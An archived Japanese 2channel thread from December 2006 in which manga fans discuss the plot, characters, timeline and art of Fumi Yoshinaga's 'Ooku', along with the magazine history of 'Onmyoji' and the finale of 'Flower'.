王子がインド風装束の半裸な格好で流し目トバしてた扉絵を思いだす。
子ども心にあれはすごい衝撃だった。

てか、編集。 嘘でも「陰陽師」も引き合いに出してやれよと。
(それこそ縁起でもないか)

雑誌派じゃないので、こんな話しか書けなくてすまんです。
でもよしなが好きです。

269 :花と名無しさん:2006/12/28(木) 01:56:44 ID:???0
脱線していきそうで申し訳ないが、陰陽師にもそれっぽいエピソードが?

270 :花と名無しさん:2006/12/28(木) 02:28:35 ID:???0
陰陽師は、白泉が拾う前に既に2回くらい掲載雑誌が変わってて
(正確には、一回目が休刊→リニューアルによる誌名変更で一時連載中断、
次が出版社倒産による廃刊で事実上の連載途絶)けっこうな雑誌クラッシャー。
で、最後は作品自体がクラッシュ。

途中までは「これは日出処を超えるか!?」と、夏目さんとかも大絶賛だったし
評価も人気も高かったので、残念に思ってる人は多い。と庇っておく。
そんなわけで連載再開のオファーは複数社から来てたが、
岡野さんが神の御神託を受けて、最終的に白泉を選んだそうだ。
よしながさんはそういう点についてはまず大丈夫だと思うが。

そういえばメロディになってからは、
原稿に電波な指定を入れて印刷所を困らせたり大変だったらしい。
印刷のエピソードで思いだしたので付記しておきます。

脱線を助長してしまってこちらこそ申し訳ない…





271 :268=270:2006/12/28(木) 02:33:57 ID:???0
ごめん、変な余白ができてしまった。

272 :花と名無しさん:2006/12/28(木) 03:55:58 ID:???0
やまざき貴子もララで揉めてなかったっけ
3分の1スペースに色々暴言や捨て台詞を書いていた気がする。

273 :花と名無しさん:2006/12/28(木) 08:25:07 ID:???O
いいかげんスレ違いなのでは・・・

274 :花と名無しさん:2006/12/28(木) 09:52:57 ID:???0
ドラマの「大奥 第一章」と同じ流れだ〜と何だか嬉しい気分で読んでます。

275 :花と名無しさん:2006/12/28(木) 11:56:07 ID:???0
>>274
そうなんだ!今日第一章SPの再放送やるので、楽しみに見るよ!

276 :花と名無しさん:2006/12/28(木) 12:33:30 ID:???O
やっぱり二人きりの閨では「千恵様」と呼んでるのね。
前にここで「そう呼んでくれたらいいなぁー」と書いたので嬉しいなぁ。
それも「お慕い申し上げております」とかじゃなく
つい出ちゃう地の京ことばで「好きや」なんて囁かれて。
一時的にでも女の姿にも戻れて、千恵様ホント良かったねえぇ。
でも、あの春日の側近の男達が気になる。
次回、絶対必従春日の命で無理やり二人を引き離すのかな。

277 :花と名無しさん :2006/12/28(木) 19:50:04 ID:???0
千恵様に将軍としての教育や権限?が与えられていたのに、ちょっと驚いた。
世継ぎを生むためだけの存在として、女子教育オンリーで育てられていたと思ってたよ。

278 :花と名無しさん:2006/12/28(木) 20:15:13 ID:???0
詳しい中身感想はあとで書くとして

千恵姫…! 閨での会話に萌えそ〜…
千恵かわいいよ千恵(*´Д`) …性格がねv

一つ個人的難点を言えば、絵柄のせいなんだろうけど
紅を引いてるし、最初から少女設定で読んでるからわかるんだけど
よしながって可愛らしい女の子をうまく描けないのかなぁ。
江戸時代・和風っぽいサッパリとした絵と言う点では向いてるが。
ちょっとカマっぽく見えてしまう時も…w 口の中の歯を描きすぎな気も。

今号の表紙カラー(つか扉絵もほとんど同じだが)の
有功さまは、煽りの「凛として」に非常にマッチしていてイイんだけどね〜。

279 :花と名無しさん:2006/12/28(木) 20:37:05 ID:???O
新キャラの捨蔵、お楽かな?お夏かな?お楽は武家出身だからお夏かな
性格的にも玉栄とソリ合わなさそうだ

280 :花と名無しさん:2006/12/28(木) 21:26:44 ID:???0
>>277
教育も権限も無いでしょ。

正勝は多分雑談のつもりで千恵姫に政治の話をしていたのだと思う。
ところが千恵姫には才覚があったので、その意見を取り入れる結果に。
老中たち(?)にも、千恵姫の案とは言っていないし。

今月号の段階では少なくとも武家側は、女が男に代われるものと、誰も思っていない。



281 :花と名無しさん:2006/12/28(木) 21:39:15 ID:???0
そう言えば、よくある出版社の買わせる企画で
http://comic6.2ch.net/test/read.cgi/gcomic/1161709322/238
次号連載はないのに、よしなが×羽海野チカとの対談があるよ。

282 :花と名無しさん:2006/12/28(木) 22:00:24 ID:???O
側近の一人の娘も男装させられてたから、あの娘が働き掛け側近が徐々に女容認になっていくんだろな
男子絶対主義は最終的に春日一人になる悪寒

283 :花と名無しさん:2006/12/28(木) 22:37:46 ID:???0
春日は死ぬ時、女系優先になる世の中を認めて逝けるんだろうか。


284 :花と名無しさん:2006/12/28(木) 22:47:07 ID:???0
>>283
逝けないから、「没日録」になったのと違うかな?
「女子が中心でも立派に世の中成り立ちますっ」と
思っていたら、他のタイトルにしそうな気が。

285 :花と名無しさん:2006/12/28(木) 23:22:04 ID:???0
春日様の心情変遷予想

ヽ(#`Д´)ノウワァァン!!→この国オワタ\(^o^)/ →('A`) モウドウナッテモシラネ

286 :花と名無しさん:2006/12/29(金) 00:20:11 ID:???0
あの男装させられてた娘、健気で萌えたので活躍してほしいな。
早く女の装束を身に着けてお仕事できるようになったらいいのに。

287 :花と名無しさん:2006/12/29(金) 00:30:45 ID:???O
家光と仲良くなれそう。
やがて大手を振って女の姿になれるとはいえ、最初からそうだった人と
男装強制経験のある人とじゃ感覚違うだろうし。

288 :花と名無しさん:2006/12/29(金) 00:31:01 ID:???0
「ご内証の方」のしきたりって、千恵姫みたいに無理矢理強姦されることがないように出来たものなのかな?

289 :花と名無しさん:2006/12/29(金) 00:46:21 ID:???0
大奥で盛り上がってきたところ豚切って悪いが
メロと同様に、本日発売の最新「Wings」でフラワーが完結!
久々に公式サイト見たら、表紙の花束持った笑顔のハルが可愛い(*´ー`)

中身の巻頭カラーはどんな感じでしたか?
今日本屋でチェック忘れてしまったのですが(本日発売モノが多かったので)、
見た人がいたら感想よろしくです。

290 :花と名無しさん:2006/12/29(金) 10:37:45 ID:???0
>>288
千恵姫が手討ちにしちゃったから、後付けでそういう理由にしたような気がする。

291 :花と名無しさん:2006/12/29(金) 13:18:46 ID:???0
>>290
んーでも、有功が来た時点では、制定されてなかったよね?
「家光様は最初の男を殺したらしいですぜ」と噂を放任していたし、実際
武士が町人を斬ってもよかった江戸時代、将軍が使用人を斬っても別に
咎められないと思う(使用人とはいっても、有力者の息子かもしれんが)。
それが後々まで続くには、何らかの他の理由があると思うよ(家光の評判を
守るためだけだったら、制度化して続ける必要はない)。

292 :花と名無しさん:2006/12/29(金) 13:29:32 ID:???0
有功のそっくりさんをあてがえば、家光姫が喜んで子供を作るとでも思ってるんだろうか?あのババ。
まあ、所詮思考形態の根っこが「七色飯」の人だからなぁ・・・
私だっら怒り狂っちゃうよ。「馬鹿にするな!」ってさ。

293 :花と名無しさん:2006/12/29(金) 14:22:37 ID:???0
>>291
将軍職を継ぐべき嗣子は女子、と確定した時点で制度化されたんじゃないか?
春日が定めたのではなく、お万が大奥総取締になったときに決めたのかも。

294 :花と名無しさん:2006/12/29(金) 14:25:55 ID:???O
同意。
自分が春日の立場なら、他の男をあてがうにしても違うタイプの美男を選ぶな。
上様が有功で満足してる以上、同じ顔は二つもいらないわけで、余計忘れがたくならないか?
有功と顔も性格も違う庶民的・野性的な水野みたいな美男とかに再誘惑させた方がいいような希ガス。

295 :花と名無しさん:2006/12/29(金) 14:26:22 ID:???0
玉栄がでかくなってて妙に嬉しい。良い男になるよ君は。

千恵姫、もうすこし可愛く描けないもんかな?
眉をゆがませた笑顔がどうも嫌味っぽい女の表情みたいで嫌だ。

296 :花と名無しさん:2006/12/29(金) 14:29:21 ID:???0
>295
見てないけどそれが家光似なところだから仕方がないのでは

297 :花と名無しさん:2006/12/29(金) 15:57:46 ID:???0
町人を教育しまくって有を殺して入れ替わりんとかないよね?いやだそんな展開

298 :花と名無しさん:2006/12/29(金) 16:49:18 ID:???0
>297
そんな小手先の猿芝居に騙される上様ではないと思うけど、実際やりかねないからなぁ>春日
史実どおり「大奥総取締役」にまで上り詰めるとしたら、ババの方が寿命尽きるけど。



299 :花と名無しさん:2006/12/29(金) 17:27:47 ID:???0
閨に侍る時、内緒で入れ替えるのでは。
当時の明かりなんて薄暗いだろうから、騙して一度契らせてしまえば何とかなるって考えでは?

300 :花と名無しさん:2006/12/29(金) 18:01:28 ID:???0
そのような気がいたす

301 :花と名無しさん:2006/12/29(金) 19:32:52 ID:???0
女体はデリケートですから
顔よりもっと大事なとこが似てないと一発バレっす。

302 :花と名無しさん:2006/12/29(金) 19:59:26 ID:???0
あの時代の夜なんて、すげー暗いんだから、顔そっくりの用意したって全然意味ないよなぁ。
ことに及ぶ前に、口開いたら一発でわかるやん。声だって違うし、話し方や受け答えでわかる
だろうに。

303 :花と名無しさん:2006/12/29(金) 20:11:20 ID:???0
家光20歳:お彩を襲う
家光29歳:家光死亡、千恵姫11歳
家光37歳:有功18歳、還俗し小姓に

千恵姫11歳:家光死亡
千恵姫15歳:女児出産
千恵姫現在:お万18歳大奥入り ※3年前、初めての男を切り殺す

何か計算が合わないよーな…
数え年と満年齢が混じってる?

304 :花と名無しさん:2006/12/29(金) 20:12:08 ID:???0
目で見るんじゃない!心で感じるんだ!

305 :花と名無しさん:2006/12/29(金) 22:12:52 ID:???0
前号と今号で一年しか経ってないのが信じられないほど千恵姫が成長して見える。
中身もぐっと大人になったし背なんか凄い伸びて思いっ切り少女→女になってるように見えるんだが…。
3年くらい経過してると言われたほうが納得するよ。

306 :花と名無しさん:2006/12/29(金) 22:47:17 ID:???0
>>289
前号がアレだったから色々怖いこと心配してたけど個人的に
納得がいくというかうまくまとまったラストだな、と思った
ハル太と真島のやり取りがなんかよかったな

4巻は2007年春発売とのことです

307 :花と名無しさん:2006/12/29(金) 22:49:28 ID:???0
有を殺して悲痛の上様に似た男をあてがうってのは?
それでお玉が対抗するとか

308 :花と名無しさん:2006/12/29(金) 22:59:29 ID:???0
フラワー最終回見たらシゲが女版小野ポジションのように思えてきた…
西洋みたいにフラワーも同人出したりするんだろうか?
ノーマルだから無いかな

309 :花と名無しさん:2006/12/29(金) 23:10:49 ID:???0
最終回立ち読みしたけどちょっと泣きそうになった

310 :花と名無しさん:2006/12/29(金) 23:11:06 ID:???O
フラワー、真島が人間らしくなってたな
個人的にはネタキャラのまんまあっさりしてたのが好きだったが
今後は滋のご都合通りになるのだろうかw

75 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)